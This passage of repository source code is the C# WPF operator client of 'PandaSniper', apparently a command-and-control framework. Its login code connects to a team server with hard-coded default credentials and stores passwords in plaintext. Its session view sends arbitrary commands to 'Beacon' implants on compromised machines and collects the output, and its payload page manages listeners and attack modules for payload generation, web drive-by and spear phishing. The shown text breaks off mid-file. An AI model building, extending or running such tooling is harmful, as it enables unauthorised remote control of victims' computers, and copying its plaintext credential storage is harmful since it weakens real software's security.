| 170 | 171 | 174 | 180 | 189 | 190 | 191 | 192 | 211 | 230 | 231 | 232 | 233 | 234 | 235 | 236 | 237 | 238 | -------------------------------------------------------------------------------- /Master/PandaSniper/LoginWindow.xaml.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections; 3 | using System.Collections.Generic; 4 | using System.IO; 5 | using System.Linq; 6 | using System.Text; 7 | using System.Threading.Tasks; 8 | using System.Windows; 9 | using System.Windows.Controls; 10 | using System.Windows.Data; 11 | using System.Windows.Documents; 12 | using System.Windows.Input; 13 | using System.Windows.Media; 14 | using System.Windows.Media.Imaging; 15 | using System.Windows.Shapes; 16 | using Newtonsoft.Json; 17 | using Newtonsoft.Json.Linq; 18 | 19 | namespace PandaSniper 20 | { 21 | /// 22 | /// LoginWindow.xaml 的交互逻辑 23 | /// 24 | public partial class LoginWindow : Window 25 | { 26 | public LoginWindow() 27 | { 28 | InitializeComponent(); 29 | } 30 | 31 | public JArray jAConfig; 32 | private void LoginWindow_Loaded(object sender, RoutedEventArgs e) 33 | { 34 | string filePath = System.AppDomain.CurrentDomain.BaseDirectory + "/.config"; 35 | if (!File.Exists(filePath)) 36 | { 37 | ConfigFormat config = new ConfigFormat(); 38 | DataConfigFormat data = new DataConfigFormat(); 39 | List listConfig = new List(); 40 | JsonSerializer serializer = new JsonSerializer(); 41 | data.host = "127.0.0.1"; 42 | data.port = "8443"; 43 | data.user = "bwb"; 44 | data.password = "ssssss"; 45 | config.id = "1"; 46 | config.ip = "New Profile"; 47 | config.data = data; 48 | listConfig.Add(config); 49 | using (StreamWriter sw = new StreamWriter(filePath)) 50 | using (JsonWriter writer = new JsonTextWriter(sw)) 51 | { 52 | serializer.Serialize(writer, listConfig); 53 | } 54 | } 55 | 56 | JsonSerializer serializer1 = new JsonSerializer(); 57 | using (StreamReader sr = new StreamReader(filePath)) 58 | using (JsonReader reader = new JsonTextReader(sr)) 59 | { 60 | this.jAConfig = (JArray)serializer1.Deserialize(reader); 61 | } 62 | 63 | //绑定listbox数据 64 | int JAConfigLength = this.jAConfig.Count(); 65 | LoginListBox.ItemsSource = LoadListBoxData(); 66 | ArrayList LoadListBoxData() 67 | { 68 | ArrayList itemsList = new ArrayList(); 69 | 70 | foreach (var item in this.jAConfig) 71 | { 72 | itemsList.Add(item["ip"]); 73 | if(item["id"].ToString() == JAConfigLength.ToString()) 74 | { 75 | LoginHost.Text = item["data"]["host"].ToString(); 76 | LoginPort.Text = item["data"]["port"].ToString(); 77 | LoginUser.Text = item["data"]["user"].ToString(); 78 | LoginPassword.Password = item["data"]["password"].ToString(); 79 | } 80 | } 81 | return itemsList; 82 | } 83 | 84 | } 85 | 86 | private void WindowTitle_MouseMove(object sender, MouseEventArgs e) 87 | { 88 | if (e.LeftButton == MouseButtonState.Pressed) 89 | { 90 | this.DragMove(); 91 | } 92 | } 93 | 94 | private void WindowClose_MouseEnter(object sender, MouseEventArgs e) 95 | { 96 | 97 | this.WindowCloseIcon.Visibility = Visibility.Visible; 98 | this.WindowMinSizeIcon.Visibility = Visibility.Visible; 99 | } 100 | private void WindowClose_MouseLeave(object sender, MouseEventArgs e) 101 | { 102 | 103 | this.WindowCloseIcon.Visibility = Visibility.Hidden; 104 | this.WindowMinSizeIcon.Visibility = Visibility.Hidden; 105 | } 106 | 107 | private void WindowMinSize_MouseEnter(object sender, MouseEventArgs e) 108 | { 109 | 110 | this.WindowCloseIcon.Visibility = Visibility.Visible; 111 | this.WindowMinSizeIcon.Visibility = Visibility.Visible; 112 | } 113 | private void WindowMinSize_MouseLeave(object sender, MouseEventArgs e) 114 | { 115 | this.WindowCloseIcon.Visibility = Visibility.Hidden; 116 | this.WindowMinSizeIcon.Visibility = Visibility.Hidden; 117 | } 118 | 119 | private void WindowMaxSize_MouseEnter(object sender, MouseEventArgs e) 120 | { 121 | 122 | this.WindowCloseIcon.Visibility = Visibility.Visible; 123 | this.WindowMinSizeIcon.Visibility = Visibility.Visible; 124 | } 125 | private void WindowMaxSize_MouseLeave(object sender, MouseEventArgs e) 126 | { 127 | this.WindowCloseIcon.Visibility = Visibility.Hidden; 128 | this.WindowMinSizeIcon.Visibility = Visibility.Hidden; 129 | } 130 | 131 | private void WindowClose_Click(object sender, RoutedEventArgs e) 132 | { 133 | this.Close(); 134 | } 135 | 136 | private void WindowMinSize_Click(object sender, RoutedEventArgs e) 137 | { 138 | this.WindowState = WindowState.Minimized; 139 | } 140 | 141 | private void LoginListBox_PreviewMouseUp(object sender, RoutedEventArgs e) 142 | { 143 | if (LoginListBox.SelectedItem != null) 144 | { 145 | foreach(var item in this.jAConfig) 146 | { 147 | String ip = LoginListBox.SelectedItem.ToString(); 148 | if(ip == item["ip"].ToString()) 149 | { 150 | LoginHost.Text = item["data"]["host"].ToString(); 151 | LoginPort.Text = item["data"]["port"].ToString(); 152 | LoginUser.Text = item["data"]["user"].ToString(); 153 | LoginPassword.Password = item["data"]["password"].ToString(); 154 | } 155 | } 156 | 157 | } 158 | } 159 | 160 | 161 | 162 | private void LoginConnect_MouseEnter(object sender, MouseEventArgs e) 163 | { 164 | 165 | } 166 | 167 | private void LoginConnect_MouseLeave(object sender, MouseEventArgs e) 168 | { 169 | 170 | } 171 | 172 | private void LoginConnect_Click(object sender, RoutedEventArgs e) 173 | { 174 | string serverCertificateName = "localhost"; 175 | string machineName = LoginHost.Text; 176 | int machinePort = int.Parse(LoginPort.Text); 177 | string loginUser = LoginUser.Text; 178 | string loginPassword = LoginPassword.Password; 179 | string loginHash = Md5.EncryptString(loginPassword); 180 | SslTcpClient sslTcpClient = new SslTcpClient(machineName, machinePort, serverCertificateName); 181 | sslTcpClient.StartSslTcp(); 182 | DataFormat MessageData; 183 | MessageData.type = "0"; 184 | MessageData.token = ""; 185 | MessageData.data = new Dictionary { { "user", loginUser }, { "hash", loginHash } }; 186 | string sendMessage = JsonConvert.SerializeObject(MessageData); 187 | //Console.WriteLine(sendMessage); 188 | sslTcpClient.ReadMessage(sslTcpClient.SendMessage(sendMessage)); 189 | //Console.WriteLine(sslTcpClient.resultMessage); 190 | JObject rMJson = (JObject)JsonConvert.DeserializeObject(sslTcpClient.resultMessage); 191 | 192 | if (rMJson["code"].ToString() == "504") 193 | { 194 | MessageBox.Show("服务器不能连接,请检测是否启动Agent"); 195 | } 196 | 197 | 198 | if (rMJson["code"].ToString() == "401") 199 | { 200 | MessageBox.Show(rMJson["error"].ToString()); 201 | } 202 | 203 | if (rMJson["code"].ToString() == "500") 204 | { 205 | MessageBox.Show(rMJson["error"].ToString()); 206 | } 207 | 208 | if (rMJson["code"].ToString() == "200") 209 | { 210 | string filePath = System.AppDomain.CurrentDomain.BaseDirectory + "/.config"; 211 | JsonSerializer serializer = new JsonSerializer(); 212 | 213 | ConfigFormat config = new ConfigFormat(); 214 | DataConfigFormat data = new DataConfigFormat(); 215 | List listConfig = new List(); 216 | 217 | bool isExists = false; 218 | 219 | foreach (var item in this.jAConfig) 220 | { 221 | data.host = item["data"]["host"].ToString(); 222 | data.port = item["data"]["port"].ToString(); 223 | data.user = item["data"]["user"].ToString(); 224 | data.password = item["data"]["password"].ToString(); 225 | config.id = item["id"].ToString(); 226 | config.ip = item["ip"].ToString(); 227 | config.data = data; 228 | listConfig.Add(config); 229 | if(config.ip == machineName) 230 | { 231 | isExists = true; 232 | } 233 | } 234 | 235 | if(isExists == false) 236 | { 237 | data.host = machineName; 238 | data.port = machinePort.ToString(); 239 | data.user = loginUser; 240 | data.password = loginPassword; 241 | int id_count = jAConfig.Count + 1; 242 | config.id = id_count.ToString(); 243 | config.ip = machineName; 244 | config.data = data; 245 | listConfig.Add(config); 246 | } 247 | 248 | 249 | using (StreamWriter sw = new StreamWriter(filePath)) 250 | using (JsonWriter writer = new JsonTextWriter(sw)) 251 | { 252 | serializer.Serialize(writer, listConfig); 253 | } 254 | 255 | UserProfile userProfile = new UserProfile() 256 | { 257 | token = rMJson["result"].ToString(), 258 | host = machineName, 259 | port = machinePort.ToString(), 260 | user = loginUser, 261 | password = loginPassword, 262 | sslTcpClient = sslTcpClient, 263 | }; 264 | 265 | MainWindow mainWindow = new MainWindow() 266 | { 267 | userProfile=userProfile, 268 | }; 269 | this.Close(); 270 | mainWindow.ShowDialog(); 271 | } 272 | } 273 | 274 | private void LoginClose_MouseEnter(object sender, MouseEventArgs e) 275 | { 276 | 277 | } 278 | 279 | private void LoginClose_MouseLeave(object sender, MouseEventArgs e) 280 | { 281 | 282 | } 283 | 284 | private void LoginClose_Click(object sender, RoutedEventArgs e) 285 | { 286 | this.Close(); 287 | } 288 | } 289 | } 290 | -------------------------------------------------------------------------------- /Master/PandaSniper/MainPage.xaml.cs: -------------------------------------------------------------------------------- 1 | using MaterialDesignThemes.Wpf; 2 | using Newtonsoft.Json; 3 | using Newtonsoft.Json.Linq; 4 | using System; 5 | using System.Collections.Generic; 6 | using System.Linq; 7 | using System.Net.Security; 8 | using System.Reflection; 9 | using System.Text; 10 | using System.Threading; 11 | using System.Threading.Tasks; 12 | using System.Windows; 13 | using System.Windows.Controls; 14 | using System.Windows.Data; 15 | using System.Windows.Documents; 16 | using System.Windows.Input; 17 | using System.Windows.Media; 18 | using System.Windows.Media.Imaging; 19 | using System.Windows.Navigation; 20 | using System.Windows.Shapes; 21 | using System.Windows.Threading; 22 | 23 | namespace PandaSniper 24 | { 25 | /// 26 | /// MainPage.xaml 的交互逻辑 27 | /// 28 | public partial class MainPage : Page 29 | { 30 | public UserProfile userProfile; 31 | public Dictionary ThreadDictionary = new Dictionary(); 32 | public Dictionary sslTcpClients = new Dictionary(); 33 | 34 | 35 | public MainPage() 36 | { 37 | InitializeComponent(); 38 | //BodySessionListView.DoubleBufferedListView(true); 39 | 40 | } 41 | 42 | 43 | private void MainPage_Loaded(object sender, RoutedEventArgs e) 44 | { 45 | this.AutoSizeWindow(); 46 | } 47 | 48 | public void AutoSizeWindow() 49 | { 50 | //listview自动调节头宽度 51 | foreach (GridViewColumn item in BodySessionGridView.Columns) 52 | { 53 | switch (item.Header) 54 | { 55 | case "country": 56 | item.Width = (this.ActualWidth / 100) * 10; 57 | break; 58 | case "external": 59 | item.Width = (this.ActualWidth / 100) * 12; 60 | break; 61 | case "internal": 62 | item.Width = (this.ActualWidth / 100) * 12; 63 | break; 64 | case "pid": 65 | item.Width = (this.ActualWidth / 100) * 10; 66 | break; 67 | case "arch": 68 | item.Width = (this.ActualWidth / 100) * 10; 69 | break; 70 | case "last": 71 | item.Width = (this.ActualWidth / 100) * 17; 72 | break; 73 | case "user": 74 | item.Width = (this.ActualWidth / 100) * 8; 75 | break; 76 | case "computer": 77 | item.Width = (this.ActualWidth / 100) * 22; 78 | break; 79 | default: 80 | break; 81 | } 82 | } 83 | } 84 | 85 | private void MenuItemInteract_Click(object sender, RoutedEventArgs e) 86 | { 87 | bool TabItemisExsits = false; 88 | TabItem tabItemSelected = new TabItem(); 89 | TargetListView listViewItem = (TargetListView)this.BodySessionListView.SelectedItems[0]; 90 | foreach(TabItem tabItem in BodyControlPanel.Items) 91 | { 92 | if(tabItem.Name == ("BeaconTabItem_" + listViewItem.uid)) 93 | { 94 | TabItemisExsits = true; 95 | tabItemSelected = tabItem; 96 | } 97 | } 98 | if (listViewItem != null && TabItemisExsits == false) 99 | { 100 | TabItem BeaconTabItem = new TabItem() { }; 101 | //header 102 | StackPanel BeaconHeaderStackPanel = new StackPanel() { }; 103 | BeaconHeaderStackPanel.Orientation = Orientation.Horizontal; 104 | PackIcon packIcon = new PackIcon() 105 | { 106 | Foreground = (Brush)new BrushConverter().ConvertFromString("#FFD4D7D6"), 107 | Kind = PackIconKind.FormatAlignLeft, 108 | Height = 11, 109 | Width = 11, 110 | VerticalAlignment = VerticalAlignment.Center, 111 | Margin = new Thickness(0, 0, 5, 0), 112 | }; 113 | TextBlock textBlock = new TextBlock() { Text = "Beacon("+listViewItem.InternalIP+"#"+ listViewItem.Pid +")" }; 114 | BeaconHeaderStackPanel.Children.Add(packIcon); 115 | BeaconHeaderStackPanel.Children.Add(textBlock); 116 | 117 | //content 118 | Grid grid = new Grid(); 119 | RowDefinition rowGrid1 = new RowDefinition 120 | { 121 | Height = new GridLength(1, GridUnitType.Star) 122 | }; 123 | RowDefinition rowGrid2 = new RowDefinition 124 | { 125 | Height = new GridLength(25) 126 | }; 127 | grid.RowDefinitions.Add(rowGrid1); 128 | grid.RowDefinitions.Add(rowGrid2); 129 | 130 | Grid grid1 = new Grid(); 131 | Border border = new Border() 132 | { 133 | BorderThickness = new Thickness(0,0,0,1), 134 | BorderBrush = (Brush)new BrushConverter().ConvertFromString("#FF897979") 135 | }; 136 | grid1.Children.Add(border); 137 | 138 | ScrollViewer stackPanelScrollViewer = new ScrollViewer(); 139 | stackPanelScrollViewer.VerticalScrollBarVisibility = ScrollBarVisibility.Auto; 140 | 141 | StackPanel stackPanel = new StackPanel() 142 | { 143 | Orientation = Orientation.Vertical, 144 | Margin = new Thickness(6, 5, 6, 0), 145 | Name = "StackPanel_" + listViewItem.uid, 146 | HorizontalAlignment = HorizontalAlignment.Left, 147 | VerticalAlignment = VerticalAlignment.Top 148 | }; 149 | stackPanelScrollViewer.Content = stackPanel; 150 | grid1.Children.Add(stackPanelScrollViewer); 151 | Grid.SetRow(grid1, 0); 152 | 153 | StackPanel stackPanel1 = new StackPanel() 154 | { 155 | Orientation = Orientation.Horizontal 156 | }; 157 | Grid.SetRow(stackPanel1, 1); 158 | PackIcon packIcon1 = new PackIcon() 159 | { 160 | Kind = PackIconKind.KeyboardArrowRight, 161 | Height = 25, 162 | Width = 20 163 | }; 164 | stackPanel1.Children.Add(packIcon1); 165 | 166 | TextBox textBox = new TextBox() 167 | { 168 | Name = "BeaconTextBox_" + listViewItem.uid, 169 | Width = this.ActualWidth - 20, 170 | HorizontalAlignment = HorizontalAlignment.Left, 171 | VerticalAlignment = VerticalAlignment.Center 172 | }; 173 | textBox.KeyDown += new KeyEventHandler(BeaconTextBox_KeyDown); 174 | stackPanel1.Children.Add(textBox); 175 | 176 | grid.Children.Add(grid1); 177 | grid.Children.Add(stackPanel1); 178 | 179 | //add 180 | BeaconTabItem.Header = BeaconHeaderStackPanel; 181 | BeaconTabItem.Content = grid; 182 | BeaconTabItem.Name = "BeaconTabItem_" + listViewItem.uid; 183 | 184 | BodyControlPanel.Items.Add(BeaconTabItem); 185 | BodyControlPanel.SelectedItem = BeaconTabItem; 186 | string textBoxName = "BeaconTextBox_" + listViewItem.uid; 187 | if (this.sslTcpClients == null || !this.sslTcpClients.ContainsKey(textBoxName)) 188 | { 189 | SslTcpClient sslTcpClient = new SslTcpClient(this.userProfile.host, int.Parse(this.userProfile.port), "localhost"); 190 | sslTcpClient.StartSslTcp(); 191 | this.sslTcpClients.Add(textBoxName, sslTcpClient); 192 | } 193 | 194 | } 195 | else 196 | { 197 | BodyControlPanel.SelectedItem = tabItemSelected; 198 | } 199 | } 200 | 201 | private void TabItemClose_PreviewMouseUp(object sender, MouseButtonEventArgs e) 202 | { 203 | if(BodyControlPanel.SelectedIndex != -1 && BodyControlPanel.SelectedIndex != 0) 204 | { 205 | string uid = ((TabItem)BodyControlPanel.SelectedItem).Name.Split('_')[1]; 206 | List threadKey = new List(); 207 | foreach(var item in this.ThreadDictionary) 208 | { 209 | if (item.Key.Split('_')[0] == uid) 210 | { 211 | threadKey.Add(item.Key); 212 | } 213 | } 214 | foreach (string list in threadKey) 215 | { 216 | Thread thread = this.ThreadDictionary[list]; 217 | thread.Abort(); 218 | this.ThreadDictionary.Remove(list); 219 | 220 | } 221 | BodyControlPanel.Items.Remove(BodyControlPanel.SelectedItem); 222 | } 223 | } 224 | 225 | 226 | public class GetCommandResultClass 227 | { 228 | public string uid; 229 | public string execid; 230 | public UserProfile userProfile; 231 | public StackPanel stackPanel; 232 | 233 | public void GetCommandResult() 234 | { 235 | DataFormat MessageData; 236 | MessageData.type = "5"; 237 | MessageData.token = this.userProfile.token; 238 | MessageData.data = new Dictionary { { "uid", this.uid}, { "execid", this.execid } }; 239 | string sendMessage = JsonConvert.SerializeObject(MessageData); 240 | bool isGo = true; 241 | Thread.CurrentThread.IsBackground = true; 242 | SslTcpClient sslTcpClient = new SslTcpClient(userProfile.host,int.Parse(userProfile.port), "localhost"); 243 | sslTcpClient.StartSslTcp(); 244 | do 245 | { 246 | SslStream sslStream = sslTcpClient.SendMessage(sendMessage); 247 | sslTcpClient.ReadMessage(sslStream); 248 | JObject rMJson = (JObject)JsonConvert.DeserializeObject(sslTcpClient.resultMessage); 249 | if (rMJson["code"].ToString() == "200") 250 | { 251 | App.Current.Dispatcher.Invoke((Action)(() => 252 | { 253 | TextBlock textBlock = new TextBlock() 254 | { 255 | Text = "[" + execid + "] Result: \n" + Function.GetChsFromHex(rMJson["result"].ToString()) 256 | }; 257 | //"StackPanel_" + uid 258 | this.stackPanel.Children.Add(textBlock); 259 | })); 260 | isGo = false; 261 | sslTcpClient.CloseSslTcp(); 262 | } 263 | if (rMJson["code"].ToString() == "500" || rMJson["code"].ToString() == "401" || rMJson["code"].ToString() == "404") { 264 | isGo = false; 265 | MessageBox.Show(rMJson["error"].ToString()); 266 | } 267 | Thread.Sleep(2000); 268 | } while (isGo); 269 | 270 | } 271 | } 272 | 273 | private void BeaconTextBox_KeyDown(object sender, KeyEventArgs e) 274 | { 275 | if (e.Key == Key.Enter)//如果输入的是回车键 276 | { 277 | TextBox textBox = (TextBox)sender; 278 | string uid = textBox.Name.Split('_')[1]; 279 | if(textBox.Text.Trim() != "") 280 | { 281 | SslTcpClient sslTcpClient = this.sslTcpClients[textBox.Name]; 282 | DataFormat MessageData; 283 | MessageData.type = "2"; 284 | MessageData.token = userProfile.token; 285 | MessageData.data = new Dictionary { { "uid", uid }, { "cmd", textBox.Text.Trim() } }; 286 | string sendMessage = JsonConvert.SerializeObject(MessageData); 287 | sslTcpClient.ReadMessage(sslTcpClient.SendMessage(sendMessage)); 288 | JObject rMJson = (JObject)JsonConvert.DeserializeObject(sslTcpClient.resultMessage); 289 | if (rMJson["code"].ToString() == "200") 290 | { 291 | string execid = rMJson["result"].ToString(); 292 | if (execid != "") 293 | { 294 | 295 | TextBlock textBlock = new TextBlock() 296 | { 297 | Text = "[" + execid + "] Command: " + textBox.Text.Trim() 298 | }; 299 | Grid grid = (Grid)BodyControlPanel.SelectedContent; 300 | Grid grid1 = (Grid)grid.Children[0]; 301 | ScrollViewer scrollViewerStackPanel = (ScrollViewer)grid1.Children[1]; 302 | StackPanel stackPanel = (StackPanel)scrollViewerStackPanel.Content; 303 | stackPanel.Children.Add(textBlock); 304 | textBox.Text = ""; 305 | GetCommandResultClass myThread = new GetCommandResultClass 306 | { 307 | uid = uid, 308 | execid = execid, 309 | userProfile = this.userProfile, 310 | stackPanel = stackPanel 311 | }; 312 | Thread thread = new Thread(myThread.GetCommandResult); 313 | thread.Start(); 314 | this.ThreadDictionary.Add(uid+ "_"+ Function.GenerateRandomString(32),thread); 315 | } 316 | } 317 | 318 | } 319 | } 320 | } 321 | } 322 | } 323 | -------------------------------------------------------------------------------- /Master/PandaSniper/MainPayload.xaml.cs: -------------------------------------------------------------------------------- 1 | using Newtonsoft.Json; 2 | using Newtonsoft.Json.Linq; 3 | using System; 4 | using System.Collections.Generic; 5 | using System.Collections.ObjectModel; 6 | using System.Linq; 7 | using System.Net.Security; 8 | using System.Text; 9 | using System.Threading.Tasks; 10 | using System.Windows; 11 | using System.Windows.Controls; 12 | using System.Windows.Data; 13 | using System.Windows.Documents; 14 | using System.Windows.Input; 15 | using System.Windows.Media; 16 | using System.Windows.Media.Imaging; 17 | using System.Windows.Navigation; 18 | using System.Windows.Shapes; 19 | 20 | namespace PandaSniper 21 | { 22 | /// 23 | /// MainPayload.xaml 的交互逻辑 24 | /// 25 | public partial class MainPayload : Page 26 | { 27 | public MainPayload() 28 | { 29 | InitializeComponent(); 30 | } 31 | 32 | public Packages Attacks_Packages; 33 | public PayloadGeneragor Attacks_PayloadGeneragor; 34 | public LinuxExecutable Attacks_LinuxExecutable; 35 | public LinuxExecutableS Attacks_LinuxExecutableS; 36 | public WebDriveBy Attacks_WebDriveBy; 37 | public SpearPhish Attacks_SpearPhish; 38 | 39 | public ObservableCollection listeners = new ObservableCollection() { }; 40 | 41 | public UserProfile userProfile; 42 | 43 | private void MainPayload_Loaded(object sender, RoutedEventArgs e) 44 | { 45 | this.AutoSizeWindow(); 46 | this.Attacks_Packages = new Packages(); 47 | this.Attacks_PayloadGeneragor = new PayloadGeneragor(); 48 | this.Attacks_LinuxExecutable = new LinuxExecutable(); 49 | this.Attacks_LinuxExecutableS = new LinuxExecutableS(); 50 | this.Attacks_WebDriveBy = new WebDriveBy(); 51 | this.Attacks_SpearPhish = new SpearPhish(); 52 | AttacksChangePage.Content = new Frame() 53 | { 54 | Content = this.Attacks_Packages 55 | }; 56 | MainPayloadListView.ItemsSource = this.listeners; 57 | } 58 | 59 | public void AutoSizeWindow() 60 | { 61 | //listview自动调节头宽度 62 | foreach (GridViewColumn item in MainPayloadGridView.Columns) 63 | { 64 | switch (item.Header) 65 | { 66 | case "name": 67 | item.Width = (this.MainPayloadListView.ActualWidth / 100) * 8; 68 | break; 69 | case "payload": 70 | item.Width = (this.MainPayloadListView.ActualWidth / 100) * 12; 71 | break; 72 | case "hosts": 73 | item.Width = (this.MainPayloadListView.ActualWidth / 100) * 15; 74 | break; 75 | case "port": 76 | item.Width = (this.MainPayloadListView.ActualWidth / 100) * 5; 77 | break; 78 | case "bindto": 79 | item.Width = (this.MainPayloadListView.ActualWidth / 100) * 10; 80 | break; 81 | case "header": 82 | item.Width = (this.MainPayloadListView.ActualWidth / 100) * 20; 83 | break; 84 | case "proxy": 85 | item.Width = (this.MainPayloadListView.ActualWidth / 100) * 20; 86 | break; 87 | case "profile": 88 | item.Width = (this.MainPayloadListView.ActualWidth / 100) * 10; 89 | break; 90 | default: 91 | break; 92 | } 93 | } 94 | } 95 | 96 | //监听器事件 97 | private void ListenerAdd_MouseEnter(object sender, MouseEventArgs e) 98 | { 99 | 100 | } 101 | 102 | private void ListenerAdd_MouseLeave(object sender, MouseEventArgs e) 103 | { 104 | 105 | } 106 | 107 | private void ListenerAdd_Click(object sender, RoutedEventArgs e) 108 | { 109 | AddListener addListener = new AddListener() { }; 110 | addListener.listeners = this.listeners; 111 | addListener.userProfile = this.userProfile; 112 | addListener.TransfEvent += TransfListeners; 113 | addListener.Show(); 114 | } 115 | 116 | void TransfListeners(ObservableCollection listeners) 117 | { 118 | 119 | this.listeners = listeners; 120 | 121 | } 122 | 123 | private void ListenerEdit_MouseEnter(object sender, MouseEventArgs e) 124 | { 125 | 126 | } 127 | 128 | private void ListenerEdit_MouseLeave(object sender, MouseEventArgs e) 129 | { 130 | 131 | } 132 | 133 | private void ListenerEdit_Click(object sender, RoutedEventArgs e) 134 | { 135 | 136 | } 137 | 138 | private void ListenerRemove_MouseEnter(object sender, MouseEventArgs e) 139 | { 140 | 141 | } 142 | 143 | private void ListenerRemove_MouseLeave(object sender, MouseEventArgs e) 144 | { 145 | 146 | } 147 | 148 | private void ListenerRemove_Click(object sender, RoutedEventArgs e) 149 | { 150 | string port = ((ListenersListView)MainPayloadListView.SelectedItem).Port; 151 | DataFormat MessageData; 152 | MessageData.type = "4"; 153 | MessageData.token = userProfile.token; 154 | MessageData.data = new Dictionary { { "port", port } }; 155 | string sendMessage = JsonConvert.SerializeObject(MessageData); 156 | SslTcpClient sslTcpClient = new SslTcpClient(userProfile.host, int.Parse(userProfile.port), "localhost"); 157 | sslTcpClient.StartSslTcp(); 158 | SslStream sslStream = sslTcpClient.SendMessage(sendMessage); 159 | sslTcpClient.ReadMessage(sslStream); 160 | 161 | JObject rMJson = (JObject)JsonConvert.DeserializeObject(sslTcpClient.resultMessage); 162 | if (rMJson["code"].ToString() == "200") 163 | { 164 | MessageBox.Show("删除监听成功"); 165 | this.listeners.Remove((ListenersListView)MainPayloadListView.SelectedItem); 166 | } 167 | else 168 | { 169 | MessageBox.Show(rMJson["error"].ToString()); 170 | sslTcpClient.CloseSslTcp(); 171 | return; 172 | } 173 | sslTcpClient.CloseSslTcp(); 174 | } 175 | 176 | private void ListenerRestart_MouseEnter(object sender, MouseEventArgs e) 177 | { 178 | 179 | } 180 | 181 | private void ListenerRestart_MouseLeave(object sender, MouseEventArgs e) 182 | { 183 | 184 | } 185 | 186 | private void ListenerRestart_Click(object sender, RoutedEventArgs e) 187 | { 188 | 189 | } 190 | 191 | private void ListenerHelp_MouseEnter(object sender, MouseEventArgs e) 192 | { 193 | 194 | } 195 | 196 | private void ListenerHelp_MouseLeave(object sender, MouseEventArgs e) 197 | { 198 | 199 | } 200 | 201 | private void ListenerHelp_Click(object sender, RoutedEventArgs e) 202 | { 203 | 204 | } 205 | 206 | //攻击模块事件 207 | 208 | private TreeViewItem TreeViewItemIsSelected(TreeViewItem treeViewItem) 209 | { 210 | if (treeViewItem.IsSelected) 211 | { 212 | return treeViewItem; 213 | } 214 | if (treeViewItem.HasItems == true) 215 | { 216 | foreach (TreeViewItem Item_X in treeViewItem.Items) 217 | { 218 | if (TreeViewItemIsSelected(Item_X).IsSelected) 219 | { 220 | return Item_X; 221 | } 222 | } 223 | } 224 | return treeViewItem; 225 | } 226 | 227 | private void TI_Attacks_PreviewMouseUp(object sender, MouseButtonEventArgs e) 228 | { 229 | bool IsSelected_count = false; 230 | foreach(TreeViewItem Item in Attack_TreeView.Items) 231 | { 232 | if(TreeViewItemIsSelected(Item).IsSelected) 233 | { 234 | IsSelected_count = true; 235 | } 236 | } 237 | if(IsSelected_count == false) 238 | { 239 | TVI_Packages.IsSelected = true; 240 | } 241 | } 242 | 243 | private void TVI_Packages_PreviewMouseUp(object sender, MouseButtonEventArgs e) 244 | { 245 | if(TVI_Packages.IsSelected) 246 | { 247 | if(TVI_Packages.IsExpanded == false) 248 | { 249 | TVI_Packages.IsExpanded = true; 250 | } 251 | else 252 | { 253 | TVI_Packages.IsExpanded = false; 254 | } 255 | } 256 | AttacksChangePage.Content = new Frame() 257 | { 258 | Content = this.Attacks_Packages 259 | }; 260 | } 261 | 262 | private void TVI_PayloadGeneragor_PreviewMouseUp(object sender, MouseButtonEventArgs e) 263 | { 264 | AttacksChangePage.Content = new Frame() 265 | { 266 | Content = this.Attacks_PayloadGeneragor 267 | }; 268 | } 269 | 270 | private void TVI_LinuxExecutable_PreviewMouseUp(object sender, MouseButtonEventArgs e) 271 | { 272 | AttacksChangePage.Content = new Frame() 273 | { 274 | Content = this.Attacks_LinuxExecutable 275 | }; 276 | } 277 | 278 | private void TVI_LinuxExecutableS_PreviewMouseUp(object sender, MouseButtonEventArgs e) 279 | { 280 | AttacksChangePage.Content = new Frame() 281 | { 282 | Content = this.Attacks_LinuxExecutableS 283 | }; 284 | } 285 | 286 | private void TVI_WebDriveBy_PreviewMouseUp(object sender, MouseButtonEventArgs e) 287 | { 288 | AttacksChangePage.Content = new Frame() 289 | { 290 | Content = this.Attacks_WebDriveBy 291 | }; 292 | } 293 | 294 | private void TVI_SpearPhish_PreviewMouseUp(object sender, MouseButtonEventArgs e) 295 | { 296 | AttacksChangePage.Content = new Frame() 297 | { 298 | Content = this.Attacks_SpearPhish 299 | }; 300 | } 301 | } 302 | } 303 | -------------------------------------------------------------------------------- /Master/PandaSniper/MainSetting.xaml: -------------------------------------------------------------------------------- 1 |  11 | 12 | 13 | 14 | 15 | 16 | -------------------------------------------------------------------------------- /Master/PandaSniper/MainSetting.xaml.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.Threading.Tasks; 6 | using System.Windows; 7 | using System.Windows.Controls; 8 | using System.Windows.Data; 9 | using System.Windows.Documents; 10 | using System.Windows.Input; 11 | using System.Windows.Media; 12 | using System.Windows.Media.Imaging; 13 | using System.Windows.Navigation; 14 | using System.Windows.Shapes; 15 | 16 | namespace PandaSniper 17 | { 18 | /// 19 | /// MainSetting.xaml 的交互逻辑 20 | /// 21 | public partial class MainSetting : Page 22 | { 23 | public MainSetting() 24 | { 25 | InitializeComponent(); 26 | } 27 | } 28 | } 29 | -------------------------------------------------------------------------------- /Master/PandaSniper/MainWindow.xaml: -------------------------------------------------------------------------------- 1 |  24 | 25 | 26 | 27 | 28 | 29 | 30 | 33 | 34 | 35 | 36 | 37 | 38 | 39 | 40 | 41 | 58 | 59 | 60 | 77 | 78 | 79 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | 110 | 111 | 112 | 113 | 114 | 115 | 129 | 130 | 131 | 145 | 146 | 147 | 148 | 149 | 150 | 164 | 165 | 166 | 167 | 168 | 169 | 170 | 171 | 172 | 173 | 174 | -------------------------------------------------------------------------------- /Master/PandaSniper/MainWindow.xaml.cs: -------------------------------------------------------------------------------- 1 | using Newtonsoft.Json; 2 | using Newtonsoft.Json.Linq; 3 | using System; 4 | using System.Collections; 5 | using System.Collections.Generic; 6 | using System.Collections.ObjectModel; 7 | using System.ComponentModel; 8 | using System.Diagnostics.CodeAnalysis; 9 | using System.Linq; 10 | using System.Net.Security; 11 | using System.Text; 12 | using System.Threading; 13 | using System.Threading.Tasks; 14 | using System.Windows; 15 | using System.Windows.Controls; 16 | using System.Windows.Data; 17 | using System.Windows.Documents; 18 | using System.Windows.Input; 19 | using System.Windows.Media; 20 | using System.Windows.Media.Imaging; 21 | using System.Windows.Navigation; 22 | using System.Windows.Shapes; 23 | using System.Windows.Threading; 24 | 25 | namespace PandaSniper 26 | { 27 | /// 28 | /// MainWindow.xaml 的交互逻辑 29 | /// 30 | public partial class MainWindow : Window 31 | { 32 | public 